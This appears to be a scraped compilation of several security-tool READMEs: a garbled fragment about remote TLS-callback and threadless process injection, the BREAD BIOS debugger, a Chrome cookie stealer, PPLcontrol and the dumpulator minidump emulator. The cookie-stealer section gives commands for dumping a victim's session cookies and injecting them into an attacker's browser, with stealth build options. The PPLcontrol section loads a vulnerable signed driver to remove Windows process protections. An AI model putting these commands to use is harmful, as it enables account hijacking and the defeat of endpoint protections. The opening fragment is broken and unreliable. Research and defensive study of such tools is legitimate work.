New Module 34: TLS Callbacks For Anti-Debugging
New Module 35: Threadless Injection
The PoC follows these steps:
CreateProcessViaWinAPIsW
function (i.e. RuntimeBroker.exe
).g_FixedShellcode
and the main payload.The g_FixedShellcode
shellcode will then make sure that the main payload executes only once by restoring the original TLS callback's original address before calling the main payload. A TLS callback can execute multiple times across the lifespan of a process, therefore it is important to control the number of times the payload is triggered by restoring the original code path execution to the original TLS callback function.
The following image shows our implementation, RemoteTLSCallbackInjection.exe
, spawning a cmd.exe
as its main payload.
BREAD (BIOS Reverse Engineering & Advanced Debugging) is an 'injectable' real-mode x86 debugger that can debug arbitrary real-mode code (on real HW) from another PC via serial cable.
BREAD emerged from many failed attempts to reverse engineer legacy BIOS. Given that the vast majority -- if not all -- BIOS analysis is done statically using disassemblers, understanding the BIOS becomes extremely difficult, since there's no way to know the value of registers or memory in a given piece of code.
Despite this, BREAD can also debug arbitrary code in real-mode, such as bootable code or DOS programs too.
This debugger is divided into two parts: the debugger (written entirely in assembly and running on the hardware being debugged) and the bridge, written in C and running on Linux.
The debugger is the injectable code, written in 16-bit real-mode, and can be placed within the BIOS ROM or any other real-mode code. When executed, it sets up the appropriate interrupt handlers, puts the processor in single-step mode, and waits for commands on the serial port.
The bridge, on the other hand, is the link between the debugger and GDB. The bridge communicates with GDB via TCP and forwards the requests/responses to the debugger through the serial port. The idea behind the bridge is to remove the complexity of GDB packets and establish a simpler protocol for communicating with the machine. In addition, the simpler protocol enables the final code size to be smaller, making it easier for the debugger to be injectable into various different environments.
As shown in the following diagram:
+---------+ simple packets +----------+ GDB packets +---------+
| |--------------->| |--------------->| |
| dbg | | bridge | | gdb |
|(real HW)|<---------------| (Linux) |<---------------| (Linux) |
+---------+ serial +----------+ TCP +---------+
By implementing the GDB stub, BREAD has many features out-of-the-box. The following commands are supported:
How many? Yes. Since the code being debugged is unaware that it is being debugged, it can interfere with the debugger in several ways, to name a few:
Protected-mode jump: If the debugged code switches to protected-mode, the structures for interrupt handlers, etc. are altered and the debugger will no longer be invoked at that point in the code. However, it is possible that a jump back to real mode (restoring the full previous state) will allow the debugger to work again.
IDT changes: If for any reason the debugged code changes the IDT or its base address, the debugger handlers will not be properly invoked.
Stack: BREAD uses a stack and assumes it exists! It should not be inserted into locations where the stack has not yet been configured.
For BIOS debugging, there are other limitations such as: it is not possible to debug the BIOS code from the very beggining (bootblock), as a minimum setup (such as RAM) is required for BREAD to function correctly. However, it is possible to perform a "warm-reboot" by setting CS:EIP to F000:FFF0
. In this scenario, the BIOS initialization can be followed again, as BREAD is already properly loaded. Please note that the "code-path" of BIOS initialization during a warm-reboot may be different from a cold-reboot and the execution flow may not be exactly the same.
Building only requires GNU Make, a C compiler (such as GCC, Clang, or TCC), NASM, and a Linux machine.
The debugger has two modes of operation: polling (default) and interrupt-based:
Polling mode is the simplest approach and should work well in a variety of environments. However, due the polling nature, there is a high CPU usage:
$ git clone https://github.com/Theldus/BREAD.git
$ cd BREAD/
$ make
The interrupt-based mode optimizes CPU utilization by utilizing UART interrupts to receive new data, instead of constantly polling for it. This results in the CPU remaining in a 'halt' state until receiving commands from the debugger, and thus, preventing it from consuming 100% of the CPU's resources. However, as interrupts are not always enabled, this mode is not set as the default option:
$ git clone https://github.com/Theldus/BREAD.git
$ cd BREAD/
$ make UART_POLLING=no
Using BREAD only requires a serial cable (and yes, your motherboard has a COM header, check the manual) and injecting the code at the appropriate location.
To inject, minimal changes must be made in dbg.asm (the debugger's src). The code's 'ORG' must be changed and also how the code should return (look for ">> CHANGE_HERE <<
" in the code for places that need to be changed).
Using an AMI legacy as an example, where the debugger module will be placed in the place of the BIOS logo (0x108200
or FFFF:8210
) and the following instructions in the ROM have been replaced with a far call to the module:
...
00017EF2 06 push es
00017EF3 1E push ds
00017EF4 07 pop es
00017EF5 8BD8 mov bx,ax -β replaced by: call 0xFFFF:0x8210 (dbg.bin)
00017EF7 B8024F mov ax,0x4f02 -β
00017EFA CD10 int 0x10
00017EFC 07 pop es
00017EFD C3 ret
...
the following patch is sufficient:
diff --git a/dbg.asm b/dbg.asm
index caedb70..88024d3 100644
--- a/dbg.asm
+++ b/dbg.asm
@@ -21,7 +21,7 @@
; SOFTWARE.
[BITS 16]
-[ORG 0x0000] ; >> CHANGE_HERE <<
+[ORG 0x8210] ; >> CHANGE_HERE <<
%include "constants.inc"
@@ -140,8 +140,8 @@ _start:
; >> CHANGE_HERE <<
; Overwritten BIOS instructions below (if any)
- nop
- nop
+ mov ax, 0x4F02
+ int 0x10
nop
nop
It is important to note that if you have altered a few instructions within your ROM to invoke the debugger code, they must be restored prior to returning from the debugger.
The reason for replacing these two instructions is that they are executed just prior to the BIOS displaying the logo on the screen, which is now the debugger, ensuring a few key points:
Finding a good location to call the debugger (where the BIOS has already initialized enough, but not too late) can be challenging, but it is possible.
After this, dbg.bin
is ready to be inserted into the correct position in the ROM.
Debugging DOS programs with BREAD is a bit tricky, but possible:
dbg.asm
so that DOS understands it as a valid DOS program:times
)int 0x20
)The following patch addresses this:
diff --git a/dbg.asm b/dbg.asm
index caedb70..b042d35 100644
--- a/dbg.asm
+++ b/dbg.asm
@@ -21,7 +21,10 @@
; SOFTWARE.
[BITS 16]
-[ORG 0x0000] ; >> CHANGE_HERE <<
+[ORG 0x100]
+
+times 40*1024 db 0x90 ; keep some distance,
+ ; 40kB should be enough
%include "constants.inc"
@@ -140,7 +143,7 @@ _start:
; >> CHANGE_HERE <<
; Overwritten BIOS instructions below (if any)
- nop
+ int 0x20 ; DOS interrupt to exit process
nop
Create a bootable FreeDOS (or DOS) floppy image containing just the kernel and the terminal: KERNEL.SYS
and COMMAND.COM
. Also add to this floppy image the program to be debugged and the DBG.COM
(dbg.bin
).
The following steps should be taken after creating the image:
bridge
already opened (refer to the next section for instructions).DBG.COM
.DBG.COM
process to continue until it finishes.It is important to note that DOS does not erase the process image after it exits. As a result, the debugger can be configured like any other DOS program and the appropriate breakpoints can be set. The beginning of the debugger is filled with NOPs, so it is anticipated that the new process will not overwrite the debugger's memory, allowing it to continue functioning even after it appears to be "finished". This allows BREaD to debug other programs, including DOS itself.
Bridge is the glue between the debugger and GDB and can be used in different ways, whether on real hardware or virtual machine.
Its parameters are:
Usage: ./bridge [options]
Options:
-s Enable serial through socket, instead of device
-d <path> Replaces the default device path (/dev/ttyUSB0)
(does not work if -s is enabled)
-p <port> Serial port (as socket), default: 2345
-g <port> GDB port, default: 1234
-h This help
If no options are passed the default behavior is:
./bridge -d /dev/ttyUSB0 -g 1234
Minimal recommended usages:
./bridge -s (socket mode, serial on 2345 and GDB on 1234)
./bridge (device mode, serial on /dev/ttyUSB0 and GDB on 1234)
To use it on real hardware, just invoke it without parameters. Optionally, you can change the device path with the -d
parameter:
./bridge
or ./bridge -d /path/to/device
)Single-stepped, you can now connect GDB!
and then launch GDB: gdb
.For use in a virtual machine, the execution order changes slightly:
./bridge
or ./bridge -d /path/to/device
)make bochs
or make qemu
)Single-stepped, you can now connect GDB!
and then launch GDB: gdb
.In both cases, be sure to run GDB inside the BRIDGE root folder, as there are auxiliary files in this folder for GDB to work properly in 16-bit.
BREAD is always open to the community and willing to accept contributions, whether with issues, documentation, testing, new features, bugfixes, typos, and etc. Welcome aboard.
BREAD is licensed under MIT License. Written by Davidson Francis and (hopefully) other contributors.
Breakpoints are implemented as hardware breakpoints and therefore have a limited number of available breakpoints. In the current implementation, only 1 active breakpoint at a time! β©
Hardware watchpoints (like breakpoints) are also only supported one at a time. β©
Please note that debug registers do not work by default on VMs. For bochs, it needs to be compiled with the --enable-x86-debugger=yes
flag. For Qemu, it needs to run with KVM enabled: --enable-kvm
(make qemu
already does this). β©
Attaches to Chrome using its Remote DevTools protocol and steals/injects/clears/deletes cookies.
Heavily inspired by WhiteChocolateMacademiaNut.
Cookies are dumped as JSON objects using Chrome's own format. The same format is used for cookies to be loaded.
For legal use only.
Steal a victim's cookies:
git clone https://github.com/magisterquis/chromecookiestealer.git
cd chromecookiestealer
go build
pkill Chrome
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --restore-last-session # Varies by target
./chromecookiestealer -dump ./cookies.json
Inject into the attacker's local browser:
# Start Chrome with a debug port, as above.
./chromecookiestealer -clear -inject ./cookies.json
Usage: chromecookiestealer [options]
Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)
and, in order and as requested:
- Dumps cookies
- Clears cookies
- Injects cookies
- Deletes selected cookies
Parameters for cookies to be deleted should be represented as an array of JSON
objects with the following string fields:
name - Name of the cookies to remove.
url - If specified, deletes all the cookies with the given name where domain
and path match provided URL.
domain - If specified, deletes only cookies with the exact domain.
path - If specified, deletes only cookies with the exact path.
Filenames may also be "-" for stdin/stdout.
Options:
-chrome URL
Chrome remote debugging URL (default "ws://127.0.0.1:9222")
-clear
C lear browser cookies
-delete file
Name of file containing parameters for cookies to delete
-dump file
Name of file to which to dump stolen cookies
-inject file
Name of file containing cookies to inject
-no-summary
Don't print a summary on exit
-verbose
Enable verbose logging
go build
should be all that's necessary. The following may be set at compile time with -ldflags '-X main.Foo=bar'
for a touch more on-target stealth.
Variable | Description |
---|---|
DumpFile | Name of a file to which to dump cookies. Implies -dump
|
InjectFile | Name of a file from which to inject cookies. Implies -inject
|
DeleteFile | Name of a file with parameters describing cookies to delete. Implies -delete
|
DoClear | If set to any value, implies -clear
|
None of the above are set by default.
The Chrome DevTools Protocol is a bit of a moving target. It may be necessary to use a newer version of the chromedp and cdproto libraries should this program stop working. This can be done with
go get -u -v all
go mod tidy
go build
which could well have the side-effect of breaking everything else.
Β―\_(γ)_/Β―
This tool allows you to list protected processes, get the protection level of a specific process, or set an arbitrary protection level. For more information, you can read this blog post: Debugging Protected Processes.
You can get a copy of the MSI driver RTCore64.sys
here: PPLKiller/driver.
Disclaimer: it goes without saying that you should never install this driver on your host machine. Use a VM!
sc.exe create RTCore64 type= kernel start= auto binPath= C:\PATH\TO\RTCore64.sys DisplayName= "Micro - Star MSI Afterburner"
net start RTCore64
List protected processes.
PPLcontrol.exe list
Get the protection level of a specific process.
PPLcontrol.exe get 1234
Set an arbitrary protection level.
PPLcontrol.exe set 1234 PPL WinTcb
Protect a non-protected process with an arbitrary protection level. This will also automatically adjust the signature levels accordingly.
PPLcontrol.exe protect 1234 PPL WinTcb
Unprotect a protected process. This will set the protection level to 0
(i.e. None
) and the EXE/DLL signature levels to 0
(i.e. Unchecked
).
PPLcontrol.exe unprotect 1234
net stop RTCore64
sc.exe delete RTCore64
WinDbg just needs to open the target process, so you can use PPLcontrol to set an arbitrary protection level on your windbg.exe
process.
windbg.exe
process.C:\Temp>tasklist | findstr /i windbg
windbg.exe 1232 Console 1 24,840 K
C:\Temp>PPLcontrol.exe protect 1232 PPL WinTcb
[+] The Protection 'PPL-WinTcb' was set on the process with PID 1232, previous protection was: 'None-None'.
[+] The Signature level 'WindowsTcb' and the Section signature level 'Windows' were set on the process with PID 1232.
In addition to opening the target process, API monitor injects a DLL into it. Therefore, setting an arbitrary protection level on your apimonitor.exe
process won't suffice. Since the injected DLL is not properly signed for this purpose, the Section signature flag of the target process will likely prevent it from being loaded. However, you can temporarily disable the protection on the target process, start monitoring it, and restore the protection right after.
Failed to load module in target process - Error: 577, Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
C:\Temp>tasklist | findstr /i target
target.exe 1337 Services 1 14,160 K
C:\Temp>PPLcontrol.exe get 1337
[+] The process with PID 1337 is a PPL with the Signer type 'WinTcb' (6).
C:\Temp>PPLcontrol.exe unprotect 1337
[+] The process with PID 1337 is no longer a PP(L).
C:\Temp>PPLcontrol.exe protect 1337 PPL WinTcb
[+] The Protection 'PPL-WinTcb' was set on the process with PID 1337, previous protection was: 'None-None'.
[+] The Signature level 'WindowsTcb' and the Section signature level 'Windows' were set on the process with PID 1337.
Release/x64
(x86
is not supported and will probably never be).Note: This is a work-in-progress prototype, please treat it as such. Pull requests are welcome! You can get your feet wet with good first issues
An easy-to-use library for emulating code in minidump files. Here are some links to posts/videos using dumpulator:
The example below opens StringEncryptionFun_x64.dmp
(download a copy here), allocates some memory and calls the decryption function at 0x140001000
to decrypt the string at 0x140017000
:
from dumpulator import Dumpulator
dp = Dumpulator("StringEncryptionFun_x64.dmp")
temp_addr = dp.allocate(256)
dp.call(0x140001000, [temp_addr, 0x140017000])
decrypted = dp.read_str(temp_addr)
print(f"decrypted: '{decrypted}'")
The StringEncryptionFun_x64.dmp
is collected at the entry point of the tests/StringEncryptionFun
example. You can get the compiled binaries for StringEncryptionFun
here
from dumpulator import Dumpulator
dp = Dumpulator("StringEncryptionFun_x64.dmp", trace=True)
dp.start(dp.regs.rip)
This will create StringEncryptionFun_x64.dmp.trace
with a list of instructions executed and some helpful indications when switching modules etc. Note that tracing significantly slows down emulation and it's mostly meant for debugging.
from dumpulator import Dumpulator
dp = Dumpulator("my.dmp")
buf = dp.call(0x140001000)
dp.read_str(buf, encoding='utf-16')
Say you have the following function:
00007FFFC81C06C0 | mov qword ptr [rsp+0x10],rbx ; prolog_start
00007FFFC81C06C5 | mov qword ptr [rsp+0x18],rsi
00007FFFC81C06CA | push rbp
00007FFFC81C06CB | push rdi
00007FFFC81C06CC | push r14
00007FFFC81C06CE | lea rbp,qword ptr [rsp-0x100]
00007FFFC81C06D6 | sub rsp,0x200 ; prolog_end
00007FFFC81C06DD | mov rax,qword ptr [0x7FFFC8272510]
You only want to execute the prolog and set up some registers:
from dumpulator import Dumpulator
prolog_start = 0x00007FFFC81C06C0
# we want to stop the instruction after the prolog
prolog_end = 0x00007FFFC81C06D6 + 7
dp = Dumpulator("my.dmp", quiet=True)
dp.regs.rcx = 0x1337
dp.start(start=prolog_start, end=prolog_end)
print(f"rsp: {hex(dp.regs.rsp)}")
The quiet
flag suppresses the logs about DLLs loaded and memory regions set up (for use in scripts where you want to reduce log spam).
You can (re)implement syscalls by using the @syscall
decorator:
from dumpulator import *
from dumpulator.native import *
from dumpulator.handles import *
from dumpulator.memory import *
@syscall
def ZwQueryVolumeInformationFile(dp: Dumpulator,
FileHandle: HANDLE,
IoStatusBlock: P[IO_STATUS_BLOCK],
FsInformation: PVOID,
Length: ULONG,
FsInformationClass: FSINFOCLASS
):
return STATUS_NOT_IMPLEMENTED
All the syscall function prototypes can be found in ntsyscalls.py. There are also a lot of examples there on how to use the API.
To hook an existing syscall implementation you can do the following:
import dumpulator.ntsyscalls as ntsyscalls
@syscall
def ZwOpenProcess(dp: Dumpulator,
ProcessHandle: Annotated[P[HANDLE], SAL("_Out_")],
DesiredAccess: Annotated[ACCESS_MASK, SAL("_In_")],
ObjectAttributes: Annotated[P[OBJECT_ATTRIBUTES], SAL("_In_")],
ClientId: Annotated[P[CLIENT_ID], SAL("_In_opt_")]
):
process_id = ClientId.read_ptr()
assert process_id == dp.parent_process_id
ProcessHandle.write_ptr(0x1337)
return STATUS_SUCCESS
@syscall
def ZwQueryInformationProcess(dp: Dumpulator,
ProcessHandle: Annotated[HANDLE, SAL("_In_")],
ProcessInformationClass: Annotated[PROCESSINFOCLASS, SAL("_In_")],
ProcessInformation: Annotated[PVOID, SAL("_Out_wri tes_bytes_(ProcessInformationLength)")],
ProcessInformationLength: Annotated[ULONG, SAL("_In_")],
ReturnLength: Annotated[P[ULONG], SAL("_Out_opt_")]
):
if ProcessInformationClass == PROCESSINFOCLASS.ProcessImageFileNameWin32:
if ProcessHandle == dp.NtCurrentProcess():
main_module = dp.modules[dp.modules.main]
image_path = main_module.path
elif ProcessHandle == 0x1337:
image_path = R"C:\Windows\explorer.exe"
else:
raise NotImplementedError()
buffer = UNICODE_STRING.create_buffer(image_path, ProcessInformation)
assert ProcessInformationLength >= len(buffer)
if ReturnLength.ptr:
dp.write_ulong(ReturnLength.ptr, len(buffer))
ProcessInformation.write(buffer)
return STATUS_SUCCESS
return ntsyscal ls.ZwQueryInformationProcess(dp,
ProcessHandle,
ProcessInformationClass,
ProcessInformation,
ProcessInformationLength,
ReturnLength
)
Since v0.2.0
there is support for easily declaring your own structures:
from dumpulator.native import *
class PROCESS_BASIC_INFORMATION(Struct):
ExitStatus: ULONG
PebBaseAddress: PVOID
AffinityMask: KAFFINITY
BasePriority: KPRIORITY
UniqueProcessId: ULONG_PTR
InheritedFromUniqueProcessId: ULONG_PTR
To instantiate these structures you have to use a Dumpulator
instance:
pbi = PROCESS_BASIC_INFORMATION(dp)
assert ProcessInformationLength == Struct.sizeof(pbi)
pbi.ExitStatus = 259 # STILL_ACTIVE
pbi.PebBaseAddress = dp.peb
pbi.AffinityMask = 0xFFFF
pbi.BasePriority = 8
pbi.UniqueProcessId = dp.process_id
pbi.InheritedFromUniqueProcessId = dp.parent_process_id
ProcessInformation.write(bytes(pbi))
if ReturnLength.ptr:
dp.write_ulong(ReturnLength.ptr, Struct.sizeof(pbi))
return STATUS_SUCCESS
If you pass a pointer value as a second argument the structure will be read from memory. You can declare pointers with myptr: P[MY_STRUCT]
and dereferences them with myptr[0]
.
There is a simple x64dbg plugin available called MiniDumpPlugin The minidump command has been integrated into x64dbg since 2022-10-10. To create a dump, pause execution and execute the command MiniDump my.dmp
.
python -m pip install dumpulator
To install from source:
python setup.py install
Install for a development environment:
python setup.py develop
What sets dumpulator apart from sandboxes like speakeasy and qiling is that the full process memory is available. This improves performance because you can emulate large parts of malware without ever leaving unicorn. Additionally only syscalls have to be emulated to provide a realistic Windows environment (since everything actually is a legitimate process environment).